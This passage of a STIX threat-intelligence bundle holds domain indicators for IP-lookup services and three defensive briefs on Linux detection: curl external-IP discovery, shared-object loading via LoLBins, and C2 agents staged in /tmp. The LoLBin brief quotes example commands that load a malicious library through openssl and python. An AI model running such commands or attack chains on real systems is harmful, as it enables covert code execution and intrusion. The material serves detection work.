      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--c4c80e07-4b62-5bdc-8094-133f5817360b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ca00621e-f56c-503b-a429-5837b1850f56",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: geoplugin.net",
      "pattern": "[domain-name:value = 'geoplugin.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fa511555-7cb2-5bc1-8bcd-1b97b3b62b71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--ca00621e-f56c-503b-a429-5837b1850f56"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2383c46a-ee97-5b82-b087-51141e359e83",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: myip.dnsomatic.com",
      "pattern": "[domain-name:value = 'myip.dnsomatic.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b7defa37-65e3-5976-8bd2-59b095dab724",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--2383c46a-ee97-5b82-b087-51141e359e83"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3106cf02-4e67-52ed-9e36-fa825fb86830",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: www.geoplugin.net",
      "pattern": "[domain-name:value = 'www.geoplugin.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5c9d1990-9397-5984-8686-9cb1f665d063",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--3106cf02-4e67-52ed-9e36-fa825fb86830"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bb321275-2a19-5c24-81bd-955188d33725",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api64.ipify.org",
      "pattern": "[domain-name:value = 'api64.ipify.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3cf2a6c5-820b-54ee-9a22-f1fbb20dcc6c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--bb321275-2a19-5c24-81bd-955188d33725"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0ccf2838-1502-5c03-b159-e04f6936c218",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ip4.seeip.org",
      "pattern": "[domain-name:value = 'ip4.seeip.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5d1c2f4c-0cff-5362-9e84-b6c3a76f2af8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--0ccf2838-1502-5c03-b159-e04f6936c218"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--09df2dff-187d-52cd-bf0d-2480def4e383",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .geojs.io",
      "pattern": "[domain-name:value = '.geojs.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--254a0100-b80d-5050-b63b-21ca98136a2e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--09df2dff-187d-52cd-bf0d-2480def4e383"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3b47e8b3-9189-58ce-935f-66225fb2e300",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: portmap.io",
      "pattern": "[domain-name:value = 'portmap.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3223340c-ea1c-51eb-a12f-f0522fc8679a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--3b47e8b3-9189-58ce-935f-66225fb2e300"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--05e178be-21d6-5a6c-967a-7c30646f5b26",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.db-ip.com",
      "pattern": "[domain-name:value = 'api.db-ip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a84b22cc-16f2-5d8f-86d7-c5c785db25c2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--05e178be-21d6-5a6c-967a-7c30646f5b26"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cbf1de71-d3c5-535d-9daa-976d524150f3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: geolocation-db.com",
      "pattern": "[domain-name:value = 'geolocation-db.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--73a1c4bb-a4fd-5ddd-9304-2ad58b709ab5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--cbf1de71-d3c5-535d-9daa-976d524150f3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9f9bee60-3f6b-5350-b2cb-b380dad2f64a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: httpbin.org",
      "pattern": "[domain-name:value = 'httpbin.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--21ad3f64-0b05-5493-918f-f9d6f8cd190c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--9f9bee60-3f6b-5350-b2cb-b380dad2f64a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8eeee298-9174-5056-a543-035c59fd0b5e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: myip.opendns.com",
      "pattern": "[domain-name:value = 'myip.opendns.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ec841f60-7f3c-59d7-a03f-030f1e1e16eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--8eeee298-9174-5056-a543-035c59fd0b5e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--30f57227-bbc4-5131-82c9-8aa30e1f99fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ipv4.icanhazip.com",
      "pattern": "[domain-name:value = 'ipv4.icanhazip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4e99fe62-d92d-52f6-9eca-2016471da8b9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--30f57227-bbc4-5131-82c9-8aa30e1f99fa"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--259620ab-d3a8-58d4-8ad6-c031903c567e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ipv6.icanhazip.com",
      "pattern": "[domain-name:value = 'ipv6.icanhazip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d9a1e628-7929-5604-8aa0-2e25d1852f26",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--259620ab-d3a8-58d4-8ad6-c031903c567e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Network Configuration Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1016",
          "url": "https://attack.mitre.org/techniques/T1016"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d92bd85c-ad70-50fb-8068-bd501bd59965",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Linux External IP Discovery via Curl",
      "description": "## Overview\n\nThis threat brief focuses on a common post-exploitation tactic where adversaries leverage the `curl` utility on Linux systems to discover the external IP address of a compromised host. This activity is frequently observed in malware and during manual attacker reconnaissance. After gaining initial access and shell capabilities, an attacker will often query public IP lookup services (e.g., ifconfig.me, ipify.org) to understand the network context of their target. This information helps them determine if the system is behind a NAT or cloud infrastructure, verify outbound connectivity, and subsequently tailor their command-and-control (C2) communications or decide on further actions. While individual instances of this activity might be benign (e.g., administrator troubleshooting), its occurrence post-compromise is a strong indicator of malicious intent, making detection crucial for identifying adversary presence and preventing subsequent stages of an attack.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker successfully compromises a Linux system, often gaining shell access through a vulnerability exploitation, credential compromise, or malicious payload execution.\n2.  **Execution of `curl`**: The attacker or malware executes the `curl` command-line utility from a shell or script.\n3.  **External IP Discovery**: `curl` is directed to contact a known public IP address lookup web service (e.g., `icanhazip.com`, `api.ipify.org`).\n4.  **Network Context Assessment**: The returned public IP address is used by the attacker to understand the system's outbound network configuration, including whether it's behind a NAT or within cloud infrastructure.\n5.  **Decision Point**: Based on the discovered IP, the attacker makes decisions regarding subsequent actions, such as configuring C2 channels, performing further reconnaissance, or exfiltrating data.\n6.  **Follow-on Activity**: The attacker proceeds with activities like establishing persistent C2, deploying additional tools, or initiating lateral movement, leveraging the gathered network intelligence.\n\n## Impact\n\nWhile the act of discovering an external IP address itself does not cause direct damage, its successful execution provides crucial intelligence to an adversary, significantly impacting the efficacy of subsequent attack stages. If this reconnaissance goes undetected, attackers can better adapt their tactics for command-and-control, data exfiltration, and lateral movement, potentially leading to widespread compromise, data breaches, or denial of service. The impact includes the successful continuation of the attack chain, making the system more vulnerable to deeper compromise and enabling attackers to bypass network defenses specifically tailored to internal IP schemes.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Linux External IP Address Discovery via Curl\" to your SIEM and tune for your environment.\n*   Configure endpoint telemetry to capture process creation events, including `process.name` and `process.command_line`, especially for `curl` executions, as required by the detection rule.\n*   Implement network egress filtering to restrict outbound `curl` access to only explicitly approved destinations, blocking the domains listed in the IOCs where not legitimately required.\n*   Review the `process.parent.name` and `process.parent.executable` fields in your logs to identify legitimate scripts or services that might trigger the rule and add them to the rule's filter block as appropriate.\n*   Monitor for `curl` activity from unusual parent processes or unexpected directories (`/tmp`, `/var/tmp`, `/dev/shm`) as highlighted in the rule's query.\n",
      "published": "2026-07-06T14:29:23Z",
      "labels": [
        "discovery",
        "linux",
        "endpoint",
        "reconnaissance",
        "curl"
      ],
      "object_refs": [
        "indicator--dc9556b6-9e18-574e-b6a1-aa8c933f8c0a",
        "indicator--573f060b-079f-5a42-ba1c-fa72503e657a",
        "indicator--68bdac5d-5e73-5d1c-b21c-f32e2c2c3a2a",
        "indicator--dcb0b0cb-cffe-54bd-9c19-ac5ab945780e",
        "indicator--a8f1a252-cad5-5317-9fff-115432237953",
        "indicator--038bc501-170f-503a-8eac-77df1d55edb1",
        "indicator--1f2c0941-8caf-52b8-b73d-8984f14bd230",
        "indicator--9aef24e8-892b-53e5-a592-5c53be998c32",
        "indicator--5f771494-61c4-5227-9119-a1f5e6fda535",
        "indicator--fd046611-e1d4-5440-8551-0dcba76856a6",
        "indicator--b09fc91f-129c-5360-8771-e14e7300a889",
        "indicator--bc44b953-8dfc-5e18-8b2c-b33cae0f4205",
        "indicator--5b2972dd-a74d-53aa-be76-03cc740fbf9e",
        "indicator--7b085f56-e3e3-5b05-9d9b-c5283cd8ad48",
        "indicator--6d256ee4-2a40-5268-b4f1-0bf4e3009a35",
        "indicator--b03eb34e-72bb-55b5-9839-170024e076e7",
        "indicator--12c372d5-abdc-51b7-a874-a8422f574ef3",
        "indicator--c62c15a0-29a9-5c15-976a-095662da2557",
        "indicator--cdb33161-85f2-55fc-bd7f-8f0fb9f3cb75",
        "indicator--c4d22d11-af0f-511e-9838-c5d28a7a0372",
        "indicator--f1e767eb-113b-57b0-8cb9-80a0f5bad2b0",
        "indicator--7f50c920-483f-5b37-a0d4-ce21ba4a834f",
        "indicator--046aa294-f2d2-5511-bf05-c8fdc8bbd0f7",
        "indicator--b5e8f71b-fe09-5913-8cb7-a8e6bf117f7e",
        "indicator--c4c80e07-4b62-5bdc-8094-133f5817360b",
        "indicator--ca00621e-f56c-503b-a429-5837b1850f56",
        "indicator--2383c46a-ee97-5b82-b087-51141e359e83",
        "indicator--3106cf02-4e67-52ed-9e36-fa825fb86830",
        "indicator--bb321275-2a19-5c24-81bd-955188d33725",
        "indicator--0ccf2838-1502-5c03-b159-e04f6936c218",
        "indicator--09df2dff-187d-52cd-bf0d-2480def4e383",
        "indicator--3b47e8b3-9189-58ce-935f-66225fb2e300",
        "indicator--05e178be-21d6-5a6c-967a-7c30646f5b26",
        "indicator--cbf1de71-d3c5-535d-9daa-976d524150f3",
        "indicator--9f9bee60-3f6b-5350-b2cb-b380dad2f64a",
        "indicator--8eeee298-9174-5056-a543-035c59fd0b5e",
        "indicator--30f57227-bbc4-5131-82c9-8aa30e1f99fa",
        "indicator--259620ab-d3a8-58d4-8ad6-c031903c567e",
        "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/discovery_curl_external_ip_discovery.toml"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d80e82fe-ff50-5b46-8c57-94030868f402",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d6e9deca-61a8-574f-af13-7303ab8b9aec",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8eb289c7-a886-5b8d-8535-49a047b66735",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d6e9deca-61a8-574f-af13-7303ab8b9aec",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--82f88866-2a2e-5550-86f9-b132b908cb31",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d6e9deca-61a8-574f-af13-7303ab8b9aec",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d6e9deca-61a8-574f-af13-7303ab8b9aec",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Linux Shared Object Load via LoLBin",
      "description": "## Overview\n\nAdversaries are known to employ Living Off The Land Binaries (LoLBins) to execute malicious code while attempting to blend in with legitimate system activities on Linux environments. This technique involves using trusted system utilities like `openssl`, `python`, or `ruby`, or even common shell interpreters, to load arbitrary shared object (`.so`) files into memory. For instance, an attacker might use `openssl -engine /tmp/libmalware.so` or `python -c 'import ctypes; ctypes.CDLL(\"/tmp/libx.so\")'` to load and execute a malicious library. This method allows adversaries to achieve code execution or defense evasion by proxying through legitimate processes, making it harder for security tools to distinguish malicious behavior from normal administrative or development tasks. This rule, updated on July 6, 2026, aims to detect such activity, which typically indicates a post-compromise phase where an attacker is establishing persistence, escalating privileges, or performing other malicious actions.\n\n## Attack Chain\n\n1.  **Initial Access:** An adversary gains initial access to a Linux host, typically through means such as exploiting a vulnerable service, using compromised credentials, or executing a malicious payload delivered via phishing.\n2.  **Staging Malicious Library:** Following initial access, the adversary stages a malicious shared object library (e.g., `libevil.so`) to a writable location on the compromised system, often a temporary directory like `/tmp` or a user's home directory.\n3.  **Executing LoLBin:** The adversary executes a Living Off The Land Binary (LoLBin) or a shell interpreter (e.g., `openssl`, `python`, `ruby`, `bash`, `vim`) with specific command-line arguments designed to load the staged malicious shared object.\n4.  **Malicious Code Execution:** The executed LoLBin loads the malicious shared object, which then executes its embedded code within the context of the legitimate process, leveraging functions like `ctypes.CDLL()` in Python or `Fiddle.dlopen()` in Ruby.\n5.  **Post-Exploitation Activity:** The malicious code performs follow-on actions, which may include establishing persistence (e.g., modifying `/etc/ld.so.preload`, cron jobs, systemd services), escalating privileges to gain higher access, or collecting system and user credentials.\n6.  **Command and Control:** The loaded malicious library might initiate covert outbound network connections to a command and control (C2) server to receive further instructions or transmit collected data.\n7.  **Data Exfiltration:** Sensitive information, credentials, or other valuable data collected during the post-exploitation phase are exfiltrated from the compromised host to attacker-controlled infrastructure.\n8.  **Defense Evasion:** By leveraging legitimate system binaries to load the malicious payload, the adversary successfully evades detection mechanisms that might otherwise flag unknown or suspicious executables, blending into normal system operations.\n\n## Impact\n\nIf this attack succeeds, the Linux host is fully compromised, leading to unauthorized code execution, potential privilege escalation, establishment of persistence, and exfiltration of sensitive data. Adversaries can leverage the compromised system as a beachhead for further network penetration, intellectual property theft, or deployment of ransomware. The impact is significant for any organization utilizing Linux systems for critical infrastructure, data storage, or application hosting, potentially leading to operational disruption, data breaches, and severe reputational damage. The technique itself serves as a defense evasion tactic, making it harder to detect and respond to the initial compromise.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Linux Shared Object Load via LoLBin\" provided in this brief to your SIEM and tune it for your environment.\n*   Ensure `process_creation` logging is enabled on all Linux endpoints to capture command-line arguments and parent-child process relationships, which are critical for activating the provided Sigma rule.\n*   Monitor for any `openssl`, `python`, `ruby`, or shell (`bash`, `sh`, `zsh`, etc.) processes loading shared object files (`.so`) from temporary (`/tmp`, `/dev/shm`) or user-writable directories.\n*   Restrict plugin and engine loads to approved library directories and enforce strict file integrity checks on critical system binaries and libraries to prevent tampering.\n*   Review and secure configurations related to `ld.so.preload`, shell startup files, cron jobs, and systemd services to prevent unauthorized persistence mechanisms.\n",
      "published": "2026-07-06T14:26:39Z",
      "labels": [
        "linux",
        "defense-evasion",
        "execution",
        "endpoint"
      ],
      "object_refs": [
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_lolbin_so_load.toml"
        },
        {
          "source_name": "reference",
          "url": "https://gtfobins.github.io/#+library%20load"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8827b000-6223-5712-be33-c09d7464d431",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cbff728d-2604-5e48-92ce-6531350a485e",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--239b2a9e-bd16-5eb6-a166-b7e7f5a7a0fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cbff728d-2604-5e48-92ce-6531350a485e",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cbff728d-2604-5e48-92ce-6531350a485e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Linux C2 Agent Activity: Suspicious Network Connection and File Creation",
      "description": "## Overview\n\nThis brief describes a common pattern of sophisticated command-and-control (C2) activity on Linux systems, often associated with C2 agents like Poseidon and Athena, which are known to integrate with C2 frameworks such as Mythic. The attack typically begins with the deployment and execution of a malicious loader or C2 agent into suspicious, writable Linux directories such as `/dev/shm`, `/tmp`, or `/var/tmp`. From these locations, the malicious process establishes an outbound network connection to its C2 server, continuously polling for commands via web requests. Upon receiving instructions, the agent proceeds to create new files on the system. These files can include staging scripts or additional payloads for subsequent execution, persistence mechanisms, or further post-exploitation activities, signaling an active and tasked implant.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains initial access to a Linux system through various means, including exploiting vulnerabilities in public-facing applications, phishing, or compromised credentials.\n2.  **Loader Deployment \u0026 Execution**: A malicious loader or C2 agent, such as Poseidon or Athena, is deployed to and executed from a suspicious, writable directory like `/dev/shm`, `/tmp`, `/var/tmp`, or `/var/log`.\n3.  **Command and Control (C2) Connection**: The executed agent initiates an outbound network connection from its precarious location to a remote command-and-control server, potentially part of a framework like Mythic.\n4.  **C2 Polling for Commands**: The C2 agent continuously polls the remote server, typically using web protocols (e.g., HTTP/S GET/POST requests), to retrieve new commands or instructions.\n5.  **File Creation for Staging**: Upon receiving commands from the C2, the agent creates a new file on the local filesystem within a suspicious writable directory (e.g., `/tmp/payload.sh` or a renamed binary) to stage a subsequent payload or script.\n6.  **Execution or Persistence**: The newly created file is then executed by the C2 agent or configured for persistence, allowing the attacker to establish a more durable foothold, elevate privileges, or perform further malicious actions.\n7.  **Post-Exploitation Activity**: With established control and persistence, the attacker proceeds with their objectives, which may include data exfiltration, lateral movement, or system disruption.\n\n## Impact\n\nIf successful, this attack pattern can lead to complete compromise of the affected Linux system, enabling attackers to maintain persistence, execute arbitrary commands, and exfiltrate sensitive data. Victims may experience unauthorized access, data breaches, and disruption of critical services. While specific victim counts are not available for this general pattern, the impact can range from isolated system compromise to widespread network infiltration if lateral movement is achieved. The presence of such C2 agents indicates a significant security breach that requires immediate containment and remediation to prevent further damage.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and correlate `Linux Suspicious Outbound Network from Writable Directory` and `Linux Suspicious File Creation by Process in Writable Directory` events within a short time window (e.g., 5 seconds) for high-fidelity detection of this C2 pattern.\n*   Ensure Elastic Defend is properly configured on all Linux endpoints to collect `network_connection` and `file_event` logs, which are essential for activating the rules above.\n*   Implement stringent network egress filtering to limit outbound connections from Linux servers to only known, legitimate destinations, reducing the effectiveness of C2 beaconing.\n*   Harden Linux systems by restricting execution permissions in commonly writable directories such as `/tmp`, `/dev/shm`, and `/var/tmp`, and enforce application allowlisting where feasible.\n*   Review the process ancestry and launch context for any binaries observed connecting outbound or creating files from suspicious writable directories to identify the initial access vector.\n",
      "published": "2026-07-06T14:25:12Z",
      "labels": [
        "linux",
        "command-and-control",
        "execution",
        "malware",
        "c2",
        "threat-detection"
      ],
      "object_refs": [
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/command_and_control_netcon_file_creation.toml"
        }
      ],
      "confidence": 40
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--76dd948a-62a9-5bd9-b165-5ec967d768c6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: 01com.com",
      "pattern": "[domain-name:value = '01com.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--792a5fe6-e381-50aa-b554-58e4fc9f85c4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--76dd948a-62a9-5bd9-b165-5ec967d768c6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ea7be5e9-ea48-5575-9576-6443317e3557",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: 247ithelp.com",
      "pattern": "[domain-name:value = '247ithelp.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--931a0a3e-1743-54d5-83a9-6be25994420e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
